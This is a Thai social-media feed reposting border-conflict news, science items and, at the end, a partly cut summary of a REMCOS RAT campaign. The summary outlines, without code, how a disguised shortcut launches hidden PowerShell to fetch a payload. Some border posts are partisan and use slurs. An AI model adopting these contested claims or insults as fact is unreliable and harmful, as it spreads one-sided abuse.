• "หลานสาวทักษิณ" ฟ้องกลับ! แจ้งความเอาผิดคนโพสต์-แชร์...กล่าวหาเป็น "ไส้ศึกเขมร" พร้อมยืนยันทุกคนในครอบครัว "เป็นคนไทยที่รักชาติ"!
    https://www.thai-tai.tv/news/20749/
    .
    #ชยิกาวงศ์นภาจันทร์ #ไส้ศึกเขมร #ข่าวปลอม #แจ้งความ #ครอบครัวชินวัตร #ความรักชาติ #ไทยไท
    "หลานสาวทักษิณ" ฟ้องกลับ! แจ้งความเอาผิดคนโพสต์-แชร์...กล่าวหาเป็น "ไส้ศึกเขมร" พร้อมยืนยันทุกคนในครอบครัว "เป็นคนไทยที่รักชาติ"! https://www.thai-tai.tv/news/20749/ . #ชยิกาวงศ์นภาจันทร์ #ไส้ศึกเขมร #ข่าวปลอม #แจ้งความ #ครอบครัวชินวัตร #ความรักชาติ #ไทยไท
    0 ความคิดเห็น 0 การแบ่งปัน 0 มุมมอง 0 รีวิว
  • แม่ทัพภาคที่ 2 เผย...จับผู้บินโดรนผิดกฎหมายได้หลายคน...อยู่ระหว่างสอบสวนเชิงลึก! ปัดข่าว "เขมร" ขอร้องไทยช่วยเก็บกู้ระเบิดปราสาทตาควาย
    https://www.thai-tai.tv/news/20746/
    .
    #แม่ทัพภาคที่2 #หยุดยิง #ชายแดนไทยกัมพูชา #เฟคนิวส์ #ข่าวปลอม #โดรน #ไทยไท
    แม่ทัพภาคที่ 2 เผย...จับผู้บินโดรนผิดกฎหมายได้หลายคน...อยู่ระหว่างสอบสวนเชิงลึก! ปัดข่าว "เขมร" ขอร้องไทยช่วยเก็บกู้ระเบิดปราสาทตาควาย https://www.thai-tai.tv/news/20746/ . #แม่ทัพภาคที่2 #หยุดยิง #ชายแดนไทยกัมพูชา #เฟคนิวส์ #ข่าวปลอม #โดรน #ไทยไท
    0 ความคิดเห็น 0 การแบ่งปัน 3 มุมมอง 0 รีวิว
  • อีมาลี ข่าวปลอมใส่ร้ายไทยรายวัน นาทีนี้ต้องส่งอีช่อออกไปจัดการ มีตำแหน่งเจ้าแม่เฟคนิวส์เป็นเดิมพัน
    #คิงส์โพธิ์แดง
    #มาลีเขมร
    อีมาลี ข่าวปลอมใส่ร้ายไทยรายวัน นาทีนี้ต้องส่งอีช่อออกไปจัดการ มีตำแหน่งเจ้าแม่เฟคนิวส์เป็นเดิมพัน #คิงส์โพธิ์แดง #มาลีเขมร
    Like
    1
    0 ความคิดเห็น 0 การแบ่งปัน 42 มุมมอง 0 รีวิว
  • การปลอมเอกสาร
    การปลอมเอกสาร
    0 ความคิดเห็น 0 การแบ่งปัน 8 มุมมอง 0 0 รีวิว
  • กัมพูชาทิ้งร่างทหาร บินโดรนล้ำเขตไทย : [THE MESSAGE]
    พล.อ.ณัฐพล นาคพาณิชย์ รมช.กลาโหม เผยถึงการประชุม
    กลาโหม 3 ฝ่าย ได้ชี้แจงเรื่องเชลยศึก หลังกัมพูชาเรียกร้องให้ปล่อยตัว เราควบคุมอย่างดีตามอนุสัญญาเจนีวา ได้ให้คณะกรรมการกาชาดระหว่างประเทศ(ไอซีอาร์ซี) เข้าไปดูเขาก็พอใจ ยังต้องสอบสวนเพื่อบันทึกข้อมูลหลักฐานให้ครบถ้วน
    แจ้ง รมว.กลาโหมกัมพูชา เก็บร่าง ทหารกัมพูชาที่เสียชีวิตจำนวนมากกลับไป ให้สมเกียรติสมศักดิ์ศรีทหาร หากปล่อยไว้นานอาจเกิดโรคระบาด ส่วนที่โฆษกกระทรวงกลาโหมกัมพูชาระบุว่า เห็นโดรนบินลํ้าเข้ามาในกัมพูชา ยืนยันเป็นของกัมพูชาที่บินกลับไป หลังจากบินล้ำเข้ามาในไทย แสดงถึงวุฒิภาวะพูดเองก็เสียเอง ยอมรับ สถานการณ์ขณะนี้เปราะบางจากข่าวปลอม โดยเฉพาะข่าวปลอมที่บอกให้ประชาชนอพยพ ทำให้กัมพูชาคิดว่าไทยเตรียมสู้รบเขาเลยเตรียมบ้าง เราต้องรวมใจเป็นหนึ่ง แค่ข่าวปลอมจากกัมพูชาก็ต้องแก้ปัญหากันทุกวัน มาเจอข่าวปลอมจากไทยอีก ทำให้ฝ่ายความมั่นคงหนักใจมาก
    กัมพูชาทิ้งร่างทหาร บินโดรนล้ำเขตไทย : [THE MESSAGE] พล.อ.ณัฐพล นาคพาณิชย์ รมช.กลาโหม เผยถึงการประชุม กลาโหม 3 ฝ่าย ได้ชี้แจงเรื่องเชลยศึก หลังกัมพูชาเรียกร้องให้ปล่อยตัว เราควบคุมอย่างดีตามอนุสัญญาเจนีวา ได้ให้คณะกรรมการกาชาดระหว่างประเทศ(ไอซีอาร์ซี) เข้าไปดูเขาก็พอใจ ยังต้องสอบสวนเพื่อบันทึกข้อมูลหลักฐานให้ครบถ้วน แจ้ง รมว.กลาโหมกัมพูชา เก็บร่าง ทหารกัมพูชาที่เสียชีวิตจำนวนมากกลับไป ให้สมเกียรติสมศักดิ์ศรีทหาร หากปล่อยไว้นานอาจเกิดโรคระบาด ส่วนที่โฆษกกระทรวงกลาโหมกัมพูชาระบุว่า เห็นโดรนบินลํ้าเข้ามาในกัมพูชา ยืนยันเป็นของกัมพูชาที่บินกลับไป หลังจากบินล้ำเข้ามาในไทย แสดงถึงวุฒิภาวะพูดเองก็เสียเอง ยอมรับ สถานการณ์ขณะนี้เปราะบางจากข่าวปลอม โดยเฉพาะข่าวปลอมที่บอกให้ประชาชนอพยพ ทำให้กัมพูชาคิดว่าไทยเตรียมสู้รบเขาเลยเตรียมบ้าง เราต้องรวมใจเป็นหนึ่ง แค่ข่าวปลอมจากกัมพูชาก็ต้องแก้ปัญหากันทุกวัน มาเจอข่าวปลอมจากไทยอีก ทำให้ฝ่ายความมั่นคงหนักใจมาก
    Like
    Sad
    2
    0 ความคิดเห็น 0 การแบ่งปัน 120 มุมมอง 0 0 รีวิว
  • EP.67 : การปลอมเอกสารคืออะไร?
    EP.67 : การปลอมเอกสารคืออะไร?
    0 ความคิดเห็น 0 การแบ่งปัน 17 มุมมอง 0 รีวิว
  • “บิ๊กเล็ก” โต้ “มาลี” ยันโดรนบินเข้าฝั่งกัมพูชาคือโดรนเขมรเองที่บินกลับจากตรวจการณ์ฝั่งไทย ชี้ สถานการณ์เปราะบางเพราะข่าวปลอม เขมรเอาไปขยายความต่อ เช่น ข่าวไทยเตรียมบุก ยอมรับรัฐตอบโต้ช้า เพราะต้องตรวจสอบความถูกต้อง เพื่อไม่เสียเครดิตในสายตาโลก วอนสื่อช่วยโต้กลับทันทีไม่ต้องรอทางการ

    อ่านต่อ..https://news1live.com/detail/9680000073646

    #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    “บิ๊กเล็ก” โต้ “มาลี” ยันโดรนบินเข้าฝั่งกัมพูชาคือโดรนเขมรเองที่บินกลับจากตรวจการณ์ฝั่งไทย ชี้ สถานการณ์เปราะบางเพราะข่าวปลอม เขมรเอาไปขยายความต่อ เช่น ข่าวไทยเตรียมบุก ยอมรับรัฐตอบโต้ช้า เพราะต้องตรวจสอบความถูกต้อง เพื่อไม่เสียเครดิตในสายตาโลก วอนสื่อช่วยโต้กลับทันทีไม่ต้องรอทางการ อ่านต่อ..https://news1live.com/detail/9680000073646 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    2
    0 ความคิดเห็น 1 การแบ่งปัน 153 มุมมอง 0 รีวิว
  • Hun Sen’s antics leave the world scratching their heads — even Cambodians are like, ‘Huh?’ (4/8/68)
    ชาวโลกงง ฮุนเซนหลอกเขมร ปล่อยเฟคนิวส์เอง คนเขมรยังงงไปหมด

    #TruthFromThailand
    #CambodiaNoCeasefire
    #Hunsenfiredfirst
    #CambodianDeception
    #กัมพูชายิงก่อน
    #เขมรโกหกโลก
    #ฮุนเซนหลอกประชาชน
    #สงครามข่าวปลอม
    #เสียงจากชายแดน
    #Thaitimes #News1 #Shorts
    #FakeNewsCambodia
    #Scambodia
    Hun Sen’s antics leave the world scratching their heads — even Cambodians are like, ‘Huh?’ (4/8/68) ชาวโลกงง ฮุนเซนหลอกเขมร ปล่อยเฟคนิวส์เอง คนเขมรยังงงไปหมด #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #CambodianDeception #กัมพูชายิงก่อน #เขมรโกหกโลก #ฮุนเซนหลอกประชาชน #สงครามข่าวปลอม #เสียงจากชายแดน #Thaitimes #News1 #Shorts #FakeNewsCambodia #Scambodia
    0 ความคิดเห็น 0 การแบ่งปัน 49 มุมมอง 0 0 รีวิว
  • กัมพูชาปั่นเองแก้เอง งั้นกะสัสมึงก็ปลอมด้วยแหละ
    #คิงส์โพธิ์แดง
    #scambodia
    กัมพูชาปั่นเองแก้เอง งั้นกะสัสมึงก็ปลอมด้วยแหละ #คิงส์โพธิ์แดง #scambodia
    Like
    2
    1 ความคิดเห็น 0 การแบ่งปัน 46 มุมมอง 0 รีวิว
  • ฮุนเซนปล่อยเฟคนิวส์ อ้างไทยจะโจมตีเมื่อคืน — มีแต่ชาวบ้านเขมรที่เชื่อ หนีอลหม่านกลางดึก [4/8/68]
    Hun Sen spreads fake news claiming Thailand would attack last night — only Cambodian villagers believed it, fleeing in chaos at midnight.

    #TruthFromThailand
    #Hunsenfiredfirst
    #CambodiaNoCeasefire
    #CambodianDeception
    #กัมพูชายิงก่อน
    #ข่าวปลอมเขมร
    #ฮุนเซนสร้างภาพ
    #สงครามจิตวิทยา
    #Thaitimes #News1 #Shorts
    #เสียงจากชายแดน
    #ปกป้องแผ่นดินไทย
    ฮุนเซนปล่อยเฟคนิวส์ อ้างไทยจะโจมตีเมื่อคืน — มีแต่ชาวบ้านเขมรที่เชื่อ หนีอลหม่านกลางดึก [4/8/68] Hun Sen spreads fake news claiming Thailand would attack last night — only Cambodian villagers believed it, fleeing in chaos at midnight. #TruthFromThailand #Hunsenfiredfirst #CambodiaNoCeasefire #CambodianDeception #กัมพูชายิงก่อน #ข่าวปลอมเขมร #ฮุนเซนสร้างภาพ #สงครามจิตวิทยา #Thaitimes #News1 #Shorts #เสียงจากชายแดน #ปกป้องแผ่นดินไทย
    0 ความคิดเห็น 0 การแบ่งปัน 46 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากข่าว: นกยูงกับเลเซอร์ในขนหาง—เมื่อธรรมชาติสร้างโพรงแสงได้เอง

    ขนนกยูงตัวผู้มีลวดลายตาไก่ที่สวยงาม ซึ่งเกิดจากโครงสร้างระดับนาโน ไม่ใช่เม็ดสี โดยเฉพาะในส่วนที่เรียกว่า “barbules” ซึ่งเป็นเส้นใยเล็ก ๆ ที่มีแท่งเมลานินเคลือบด้วยเคราตินเรียงตัวอย่างแม่นยำ ทำให้เกิดสีรุ้งที่เปลี่ยนไปตามมุมมอง

    ทีมนักวิจัยจากหลายมหาวิทยาลัยในสหรัฐฯ ได้ทดลองหยดสารเรืองแสง rhodamine 6G ลงบนขนนกยูงหลายรอบ แล้วใช้แสงเลเซอร์สีเขียวยิงเข้าไป พบว่าเกิดการเปล่งแสงเลเซอร์ที่มีความถี่คงที่ที่ 574 และ 583 นาโนเมตร ซึ่งเป็นสีเหลือง-ส้ม

    สิ่งที่น่าทึ่งคือ ไม่ว่าจะยิงไปที่ส่วนไหนของตาไก่—ไม่ว่าจะเป็นสีน้ำเงิน เขียว เหลือง หรือน้ำตาล—ก็ได้ผลเหมือนกันหมด แสดงว่าโครงสร้างภายในขนนกยูงมีความเป็นระเบียบและสามารถทำหน้าที่เป็นโพรงเลเซอร์ได้จริง

    ผลการทดลองนี้แตกต่างจาก “random laser” ที่เคยพบในเนื้อเยื่อสัตว์อื่น ๆ ซึ่งมักให้ผลไม่แน่นอน แต่ขนนกยูงให้ผลซ้ำได้ทุกครั้ง และอาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัยสำหรับใช้ในร่างกาย เช่น การตรวจวินิจฉัยหรือการรักษา

    ขนนกยูงสามารถเปล่งแสงเลเซอร์ได้เมื่อเติมสารเรืองแสงและยิงแสงเลเซอร์เข้าไป
    ใช้สาร rhodamine 6G และแสงเลเซอร์สีเขียว 532 นาโนเมตร
    เกิดแสงเลเซอร์ที่ 574 และ 583 นาโนเมตร

    โครงสร้างภายในขนนกยูงทำหน้าที่เป็นโพรงเลเซอร์ได้โดยธรรมชาติ
    barbules มีโครงสร้างนาโนที่เรียงตัวอย่างแม่นยำ
    ทำหน้าที่คล้าย photonic crystals ที่สะท้อนและขยายแสง

    ผลการทดลองให้ผลซ้ำได้ทุกครั้ง ไม่ใช่แบบสุ่ม
    แตกต่างจาก random laser ที่พบในเนื้อเยื่ออื่น
    แสดงถึงความเป็นระเบียบในโครงสร้างชีวภาพ

    เป็นครั้งแรกที่พบโพรงเลเซอร์ในเนื้อเยื่อของสัตว์
    อาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัย
    ใช้ในการตรวจวินิจฉัยภายในร่างกายมนุษย์

    การทดลองใช้ขนนกยูงธรรมชาติที่ไม่มีสารเจือปน
    ตัดเฉพาะส่วนตาไก่และทำความสะอาดก่อนทดลอง
    ทำให้ผลการทดลองมีความแม่นยำและน่าเชื่อถือ

    สีของขนนกยูงเกิดจากโครงสร้าง ไม่ใช่เม็ดสี
    เป็นตัวอย่างของ “structural color” ที่เกิดจากการหักเหของแสง
    คล้ายกับสีในปีกผีเสื้อหรือเกล็ดของแมลงบางชนิด

    photonic crystals ในธรรมชาติสามารถนำไปพัฒนาเทคโนโลยีใหม่
    เช่น หน้าต่างเปลี่ยนสี, ผิววัสดุที่ทำความสะอาดตัวเอง, หรือสิ่งทอกันน้ำ
    อาจใช้ในธนบัตรเพื่อป้องกันการปลอมแปลง

    การศึกษาโครงสร้างชีวภาพระดับนาโนช่วยให้เข้าใจธรรมชาติและสร้างวัสดุใหม่
    เป็นแนวทางของ “biophotonics” และ “bio-inspired engineering”
    อาจนำไปสู่การออกแบบเลเซอร์ที่ปลอดภัยและเข้ากันได้กับร่างกายมนุษย์

    https://www.techspot.com/news/108915-scientists-transform-peacock-feathers-tiny-biological-laser-beams.html
    🎙️ เรื่องเล่าจากข่าว: นกยูงกับเลเซอร์ในขนหาง—เมื่อธรรมชาติสร้างโพรงแสงได้เอง ขนนกยูงตัวผู้มีลวดลายตาไก่ที่สวยงาม ซึ่งเกิดจากโครงสร้างระดับนาโน ไม่ใช่เม็ดสี โดยเฉพาะในส่วนที่เรียกว่า “barbules” ซึ่งเป็นเส้นใยเล็ก ๆ ที่มีแท่งเมลานินเคลือบด้วยเคราตินเรียงตัวอย่างแม่นยำ ทำให้เกิดสีรุ้งที่เปลี่ยนไปตามมุมมอง ทีมนักวิจัยจากหลายมหาวิทยาลัยในสหรัฐฯ ได้ทดลองหยดสารเรืองแสง rhodamine 6G ลงบนขนนกยูงหลายรอบ แล้วใช้แสงเลเซอร์สีเขียวยิงเข้าไป พบว่าเกิดการเปล่งแสงเลเซอร์ที่มีความถี่คงที่ที่ 574 และ 583 นาโนเมตร ซึ่งเป็นสีเหลือง-ส้ม สิ่งที่น่าทึ่งคือ ไม่ว่าจะยิงไปที่ส่วนไหนของตาไก่—ไม่ว่าจะเป็นสีน้ำเงิน เขียว เหลือง หรือน้ำตาล—ก็ได้ผลเหมือนกันหมด แสดงว่าโครงสร้างภายในขนนกยูงมีความเป็นระเบียบและสามารถทำหน้าที่เป็นโพรงเลเซอร์ได้จริง ผลการทดลองนี้แตกต่างจาก “random laser” ที่เคยพบในเนื้อเยื่อสัตว์อื่น ๆ ซึ่งมักให้ผลไม่แน่นอน แต่ขนนกยูงให้ผลซ้ำได้ทุกครั้ง และอาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัยสำหรับใช้ในร่างกาย เช่น การตรวจวินิจฉัยหรือการรักษา ✅ ขนนกยูงสามารถเปล่งแสงเลเซอร์ได้เมื่อเติมสารเรืองแสงและยิงแสงเลเซอร์เข้าไป ➡️ ใช้สาร rhodamine 6G และแสงเลเซอร์สีเขียว 532 นาโนเมตร ➡️ เกิดแสงเลเซอร์ที่ 574 และ 583 นาโนเมตร ✅ โครงสร้างภายในขนนกยูงทำหน้าที่เป็นโพรงเลเซอร์ได้โดยธรรมชาติ ➡️ barbules มีโครงสร้างนาโนที่เรียงตัวอย่างแม่นยำ ➡️ ทำหน้าที่คล้าย photonic crystals ที่สะท้อนและขยายแสง ✅ ผลการทดลองให้ผลซ้ำได้ทุกครั้ง ไม่ใช่แบบสุ่ม ➡️ แตกต่างจาก random laser ที่พบในเนื้อเยื่ออื่น ➡️ แสดงถึงความเป็นระเบียบในโครงสร้างชีวภาพ ✅ เป็นครั้งแรกที่พบโพรงเลเซอร์ในเนื้อเยื่อของสัตว์ ➡️ อาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัย ➡️ ใช้ในการตรวจวินิจฉัยภายในร่างกายมนุษย์ ✅ การทดลองใช้ขนนกยูงธรรมชาติที่ไม่มีสารเจือปน ➡️ ตัดเฉพาะส่วนตาไก่และทำความสะอาดก่อนทดลอง ➡️ ทำให้ผลการทดลองมีความแม่นยำและน่าเชื่อถือ ✅ สีของขนนกยูงเกิดจากโครงสร้าง ไม่ใช่เม็ดสี ➡️ เป็นตัวอย่างของ “structural color” ที่เกิดจากการหักเหของแสง ➡️ คล้ายกับสีในปีกผีเสื้อหรือเกล็ดของแมลงบางชนิด ✅ photonic crystals ในธรรมชาติสามารถนำไปพัฒนาเทคโนโลยีใหม่ ➡️ เช่น หน้าต่างเปลี่ยนสี, ผิววัสดุที่ทำความสะอาดตัวเอง, หรือสิ่งทอกันน้ำ ➡️ อาจใช้ในธนบัตรเพื่อป้องกันการปลอมแปลง ✅ การศึกษาโครงสร้างชีวภาพระดับนาโนช่วยให้เข้าใจธรรมชาติและสร้างวัสดุใหม่ ➡️ เป็นแนวทางของ “biophotonics” และ “bio-inspired engineering” ➡️ อาจนำไปสู่การออกแบบเลเซอร์ที่ปลอดภัยและเข้ากันได้กับร่างกายมนุษย์ https://www.techspot.com/news/108915-scientists-transform-peacock-feathers-tiny-biological-laser-beams.html
    WWW.TECHSPOT.COM
    Scientists transform peacock feathers into tiny biological laser beams
    The research, conducted by researchers from several US universities and published in Nature, set out to explore the behavior of peacock feather barbules – microscopic structures that...
    0 ความคิดเห็น 0 การแบ่งปัน 43 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: กราฟีนที่เคยแข็งแกร่ง กลับยืดหยุ่นได้ด้วยลอนคลื่นระดับอะตอม

    นักฟิสิกส์จากมหาวิทยาลัย Vienna และ Vienna University of Technology ได้ค้นพบวิธีทำให้กราฟีน—วัสดุที่บางเพียงหนึ่งอะตอมและแข็งแกร่งที่สุด—สามารถยืดหยุ่นได้มากขึ้น โดยใช้เทคนิคการสร้าง “ข้อบกพร่อง” (defects) ด้วยการยิงไอออนอาร์กอนพลังงานต่ำเข้าไปในโครงสร้างอะตอมของกราฟีน ทำให้เกิด “vacancies” หรือช่องว่างจากอะตอมที่หายไป

    ผลลัพธ์คือเกิดลอนคลื่นคล้ายหีบเพลงในโครงสร้างของกราฟีน ซึ่งช่วยให้วัสดุสามารถยืดออกได้ง่ายขึ้นมาก โดยไม่ต้องใช้แรงมากเหมือนการยืดวัสดุเรียบ ๆ แบบเดิม

    การทดลองนี้เกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ เพื่อให้มั่นใจว่าไม่มีสิ่งแปลกปลอมมารบกวนพื้นผิวของกราฟีน ซึ่งเป็นสิ่งสำคัญมาก เพราะหากมีสิ่งสกปรกอยู่บนพื้นผิว จะทำให้กราฟีนกลับมาแข็งขึ้นแทนที่จะอ่อนลง

    กราฟีนถูกทำให้ยืดหยุ่นขึ้นด้วยการสร้างลอนคลื่นคล้ายหีบเพลง (accordion effect)
    ใช้การยิงไอออนอาร์กอนพลังงานต่ำเพื่อสร้างช่องว่างอะตอม
    ลอนคลื่นช่วยลดแรงที่ต้องใช้ในการยืดวัสดุ

    การทดลองเกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ
    ป้องกันไม่ให้สิ่งแปลกปลอมรบกวนพื้นผิวกราฟีน
    ทำให้ผลการทดลองแม่นยำและเสถียร

    ค่าความยืดหยุ่นของกราฟีนลดลงจาก 286 N/m เหลือ 158 N/m หลังสร้าง defects
    เป็นการเปลี่ยนแปลงที่มากกว่าที่ทฤษฎีเคยคาดไว้
    อธิบายความขัดแย้งในผลการทดลองก่อนหน้านี้

    การสร้าง defects แบบควบคุมได้ช่วยให้วัสดุมีคุณสมบัติใหม่
    เปิดทางสู่การใช้งานในอุปกรณ์อิเล็กทรอนิกส์แบบยืดหยุ่น
    เหมาะกับเทคโนโลยีสวมใส่และอุปกรณ์พับได้

    การจำลองด้วยคอมพิวเตอร์ยืนยันว่า defects แบบหลายอะตอมมีผลมากกว่าการลบอะตอมเดี่ยว
    ลอนคลื่นเกิดจากแรงดึงรอบจุดที่มีหลายอะตอมหายไป
    การลบอะตอมเดี่ยวไม่ส่งผลต่อความยืดหยุ่นมากนัก

    https://www.neowin.net/news/the-miracle-material-has-been-bent-like-never-before/
    🎙️ เรื่องเล่าจากข่าว: กราฟีนที่เคยแข็งแกร่ง กลับยืดหยุ่นได้ด้วยลอนคลื่นระดับอะตอม นักฟิสิกส์จากมหาวิทยาลัย Vienna และ Vienna University of Technology ได้ค้นพบวิธีทำให้กราฟีน—วัสดุที่บางเพียงหนึ่งอะตอมและแข็งแกร่งที่สุด—สามารถยืดหยุ่นได้มากขึ้น โดยใช้เทคนิคการสร้าง “ข้อบกพร่อง” (defects) ด้วยการยิงไอออนอาร์กอนพลังงานต่ำเข้าไปในโครงสร้างอะตอมของกราฟีน ทำให้เกิด “vacancies” หรือช่องว่างจากอะตอมที่หายไป ผลลัพธ์คือเกิดลอนคลื่นคล้ายหีบเพลงในโครงสร้างของกราฟีน ซึ่งช่วยให้วัสดุสามารถยืดออกได้ง่ายขึ้นมาก โดยไม่ต้องใช้แรงมากเหมือนการยืดวัสดุเรียบ ๆ แบบเดิม การทดลองนี้เกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ เพื่อให้มั่นใจว่าไม่มีสิ่งแปลกปลอมมารบกวนพื้นผิวของกราฟีน ซึ่งเป็นสิ่งสำคัญมาก เพราะหากมีสิ่งสกปรกอยู่บนพื้นผิว จะทำให้กราฟีนกลับมาแข็งขึ้นแทนที่จะอ่อนลง ✅ กราฟีนถูกทำให้ยืดหยุ่นขึ้นด้วยการสร้างลอนคลื่นคล้ายหีบเพลง (accordion effect) ➡️ ใช้การยิงไอออนอาร์กอนพลังงานต่ำเพื่อสร้างช่องว่างอะตอม ➡️ ลอนคลื่นช่วยลดแรงที่ต้องใช้ในการยืดวัสดุ ✅ การทดลองเกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ ➡️ ป้องกันไม่ให้สิ่งแปลกปลอมรบกวนพื้นผิวกราฟีน ➡️ ทำให้ผลการทดลองแม่นยำและเสถียร ✅ ค่าความยืดหยุ่นของกราฟีนลดลงจาก 286 N/m เหลือ 158 N/m หลังสร้าง defects ➡️ เป็นการเปลี่ยนแปลงที่มากกว่าที่ทฤษฎีเคยคาดไว้ ➡️ อธิบายความขัดแย้งในผลการทดลองก่อนหน้านี้ ✅ การสร้าง defects แบบควบคุมได้ช่วยให้วัสดุมีคุณสมบัติใหม่ ➡️ เปิดทางสู่การใช้งานในอุปกรณ์อิเล็กทรอนิกส์แบบยืดหยุ่น ➡️ เหมาะกับเทคโนโลยีสวมใส่และอุปกรณ์พับได้ ✅ การจำลองด้วยคอมพิวเตอร์ยืนยันว่า defects แบบหลายอะตอมมีผลมากกว่าการลบอะตอมเดี่ยว ➡️ ลอนคลื่นเกิดจากแรงดึงรอบจุดที่มีหลายอะตอมหายไป ➡️ การลบอะตอมเดี่ยวไม่ส่งผลต่อความยืดหยุ่นมากนัก https://www.neowin.net/news/the-miracle-material-has-been-bent-like-never-before/
    WWW.NEOWIN.NET
    The "miracle material" has been bent like never before
    Physicists discover a counterintuitive method that makes "miracle material" dramatically more stretchable, challenging long-held assumptions about its mechanical limits.
    0 ความคิดเห็น 0 การแบ่งปัน 33 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: เมื่อไฟล์ลัดกลายเป็นประตูหลัง—REMCOS RAT แฝงตัวผ่าน LNK และ PowerShell โดยไม่ทิ้งร่องรอย

    ทีมวิจัย Lat61 จากบริษัท Point Wild ได้เปิดเผยแคมเปญมัลแวร์หลายขั้นตอนที่ใช้ไฟล์ลัด Windows (.lnk) เป็นตัวเปิดทางให้ REMCOS RAT เข้าสู่ระบบของเหยื่อ โดยเริ่มจากไฟล์ที่ดูเหมือนไม่มีพิษภัย เช่น “ORDINE-DI-ACQUIST-7263535.lnk” ซึ่งเมื่อคลิกแล้วจะรันคำสั่ง PowerShell แบบลับ ๆ เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก

    หลังจากถอดรหัสแล้ว payload จะถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ที่ปลอมเป็น CHROME.PIF เพื่อหลอกว่าเป็นโปรแกรมจริง ก่อนจะติดตั้ง REMCOS RAT ซึ่งสามารถควบคุมคอมพิวเตอร์ได้เต็มรูปแบบ—ตั้งแต่ keylogging, เปิดกล้อง, ไปจนถึงการสร้าง shell ระยะไกล

    แคมเปญนี้ยังใช้เทคนิคหลบเลี่ยงการตรวจจับ เช่น ไม่ใช้ไฟล์บนดิสก์, ไม่ใช้ macro, และไม่แสดงคำเตือนใด ๆ ทำให้ผู้ใช้ทั่วไปแทบไม่รู้ตัวว่าโดนโจมตี

    แคมเปญมัลแวร์ใหม่ใช้ไฟล์ลัด Windows (.lnk) เป็นช่องทางติดตั้ง REMCOS RAT
    ไฟล์ลัดปลอมเป็นเอกสารหรือโปรแกรม เช่น “ORDINE-DI-ACQUIST…”
    เมื่อคลิกจะรัน PowerShell แบบลับ ๆ

    PowerShell ถูกใช้เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก
    ไม่ใช้ไฟล์บนดิสก์หรือ macro ทำให้หลบการตรวจจับได้
    payload ถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ปลอมชื่อเป็น CHROME.PIF

    REMCOS RAT ให้ผู้โจมตีควบคุมระบบได้เต็มรูปแบบ
    keylogging, เปิดกล้อง, สร้าง shell ระยะไกล, เข้าถึงไฟล์
    สร้าง log file ใน %ProgramData% เพื่อเก็บข้อมูลการกดแป้นพิมพ์

    เซิร์ฟเวอร์ควบคุม (C2) ของแคมเปญนี้อยู่ในสหรัฐฯ และโรมาเนีย
    แสดงให้เห็นว่าการโจมตีสามารถมาจากหลายประเทศ
    ใช้โครงสร้างแบบกระจายเพื่อหลบการติดตาม

    ไฟล์ลัดไม่แสดงคำเตือน macro และสามารถหลอกผู้ใช้ได้ง่าย
    Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น
    ไฟล์ .lnk อาจดูเหมือน .pdf หรือ .docx.

    ไฟล์ลัด (.lnk) สามารถรันคำสั่งอันตรายได้โดยไม่ต้องใช้ macro หรือไฟล์ .exe
    ผู้ใช้มักเข้าใจผิดว่าเป็นไฟล์เอกสาร
    ไม่มีการแจ้งเตือนจากระบบความปลอดภัยของ Office

    REMCOS RAT สามารถทำงานแบบ fileless โดยไม่ทิ้งร่องรอยบนดิสก์
    ยากต่อการตรวจจับด้วย antivirus แบบดั้งเดิม
    ต้องใช้ระบบป้องกันแบบ real-time และ behavioral analysis

    การปลอมชื่อไฟล์และไอคอนทำให้ผู้ใช้หลงเชื่อว่าเป็นไฟล์จริง
    Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น
    ไฟล์ .lnk อาจดูเหมือน “Invoice.pdf” ทั้งที่เป็น shortcut

    การเปิดไฟล์จากอีเมลหรือเครือข่ายที่ไม่ปลอดภัยอาจนำไปสู่การติดมัลแวร์ทันที
    ไม่ควรเปิดไฟล์แนบจากผู้ส่งที่ไม่รู้จัก
    ควรใช้ sandbox หรือระบบแยกเพื่อทดสอบไฟล์ก่อนเปิด

    https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
    🎙️ เรื่องเล่าจากข่าว: เมื่อไฟล์ลัดกลายเป็นประตูหลัง—REMCOS RAT แฝงตัวผ่าน LNK และ PowerShell โดยไม่ทิ้งร่องรอย ทีมวิจัย Lat61 จากบริษัท Point Wild ได้เปิดเผยแคมเปญมัลแวร์หลายขั้นตอนที่ใช้ไฟล์ลัด Windows (.lnk) เป็นตัวเปิดทางให้ REMCOS RAT เข้าสู่ระบบของเหยื่อ โดยเริ่มจากไฟล์ที่ดูเหมือนไม่มีพิษภัย เช่น “ORDINE-DI-ACQUIST-7263535.lnk” ซึ่งเมื่อคลิกแล้วจะรันคำสั่ง PowerShell แบบลับ ๆ เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก หลังจากถอดรหัสแล้ว payload จะถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ที่ปลอมเป็น CHROME.PIF เพื่อหลอกว่าเป็นโปรแกรมจริง ก่อนจะติดตั้ง REMCOS RAT 